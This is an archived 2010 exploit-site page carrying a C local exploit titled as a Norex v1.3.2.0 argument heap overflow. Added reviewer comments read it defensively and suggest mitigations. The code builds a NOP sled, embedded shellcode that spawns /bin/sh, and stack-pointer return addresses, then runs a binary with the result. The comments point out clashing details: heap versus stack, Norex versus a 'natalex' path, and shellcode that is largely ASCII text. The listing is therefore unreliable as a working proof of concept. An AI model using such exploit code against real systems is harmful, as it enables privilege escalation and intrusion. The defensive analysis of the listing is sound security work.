
Norex v1.3.2.0 Argument Heap-Overflow Vulnerability

Posted on 23 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Norex v1.3.2.0 Argument Heap-Overflow Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================================
Norex v1.3.2.0 Argument Heap-Overflow Vulnerability
===================================================
# Author: SiktirEdenzi aka GoteGELENZI
# Software Link: http://www.muratkaslioglu.com/norex/
# Version: v1.3.2.0
# Tested on: Linux
# CVE :
# Code :

/*
 * Reviewer summary of this listing (defensive reading).
 *
 * The program builds one long argument string and passes it as argv[1] to
 * the binary named by PATH_ZEN through execl(). The code of the target that
 * supposedly mishandles the argument is not shown, so the root cause cannot
 * be confirmed from this page.
 *
 * NOTE(review): several details do not agree with each other. The title
 * says "heap overflow", yet the string ends in addresses derived from the
 * stack pointer; the title and link name Norex while PATH_ZEN names a
 * binary called natalex; argv[0] is given as "umount"; no CVE is listed.
 * Treat the report as unverified until it is reproduced against the real
 * package in a lab.
 *
 * What a defender can take from it:
 *  - Mitigation in the target: check the length of every argv string
 *    before copying it into a fixed-size buffer, and use size-bounded
 *    copy or format calls.
 *  - Platform hardening: the fixed offset from the caller's own stack
 *    pointer presumes a predictable address layout and executable data
 *    memory; address-space randomisation and non-executable stack and heap
 *    are designed to break both assumptions.
 *  - Detection: a command-line argument of roughly 1 KiB made mostly of a
 *    single repeated byte is anomalous and shows up in process-execution
 *    telemetry.
 */
#define PATH_ZEN &quot;/usr/bin/natalex -r&quot;
#define OFFER_SIZE 1024
#define DEFAULT_OFFSET 50

/*
 * Reads the current stack pointer. The inline asm copies ESP into EAX and
 * the function has no return statement, so the caller only sees the value
 * because EAX happens to be the return register on 32-bit x86; this is
 * compiler and architecture dependent.
 */
u_long get_esp() { __asm__(&quot;movl %esp, %eax&quot;); }

/*
 * Assembles the argument string and executes the target with it.
 * argc and argv are declared but never read.
 */
main(int argc, char **argv) {
    /*
     * Payload bytes exactly as published; left untouched and not analysed
     * here. NOTE(review): a large part of the middle of this string is
     * printable ASCII text rather than instructions, which is a further
     * reason to doubt that the listing is a working proof of concept.
     */
    u_char execshell[] = &quot;xebx24x5ex8dx1ex89x5ex0bx33xd2x89x56x07x89x56x0f&quot; &quot;xb8x1bx56x34x12x62x1fx74x1fx6ex20x62x65x79x61x7a&quot; &quot;x20x1fx61x70x6bx61x6cx61x72x20x61x6ex61x6ex1fx7a&quot; &quot;x1fx20x73x69x6bx65x6ex7ax69x2cx20x68x75x7ax65x79&quot; &quot;x66x65x20x73x65x6cx61x6dx6cx61x72x20x64x6fx73x74&quot; &quot;x75x6dx20x6cx6fx6cx27x64x35x10x56x34x12x8dx4ex0b&quot; &quot;x8bxd1xcd&quot; &quot;x80x33xc0x40xcdx80xe8xd7xffxffxff/bin/sh&quot;;
    char *buff = NULL;
    unsigned long *addr_ptr = NULL;
    char *ptr = NULL;
    int i;
    int ofs = DEFAULT_OFFSET; /* never changed after this point */

    /* 4096-byte work buffer; on failure the program prints and exits with status 0. */
    buff = malloc(4096);
    if(!buff) { printf(&quot;can't allocate memory &quot;); exit(0); }
    ptr = buff;

    /* Leading filler: OFFER_SIZE minus the payload length, all bytes 0x90. */
    memset(ptr, 0x90, OFFER_SIZE-strlen(execshell));
    ptr += OFFER_SIZE-strlen(execshell);

    /* Payload copied byte by byte so that it ends at offset OFFER_SIZE. */
    for(i=0;i &lt; strlen(execshell);i++) *(ptr++) = execshell[i];

    /* Two words (8/4), each the caller's stack pointer plus ofs, follow the payload. */
    addr_ptr = (long *)ptr;
    for(i=0;i &lt; (8/4);i++) *(addr_ptr++) = get_esp() + ofs;

    /* Terminate the string so it can be passed as a single argument. */
    ptr = (char *)addr_ptr;
    *ptr = 0;

    /* alarm(0) cancels any pending alarm before the exec. */
    (void)alarm((u_int)0);

    /* Target is started with argv[0] set to "umount" and the built string as argv[1]. */
    execl(PATH_ZEN, &quot;umount&quot;, buff, NULL);
}
# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-23]</pre><script type='text/javascript'>var gaJsHost = 
(("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 
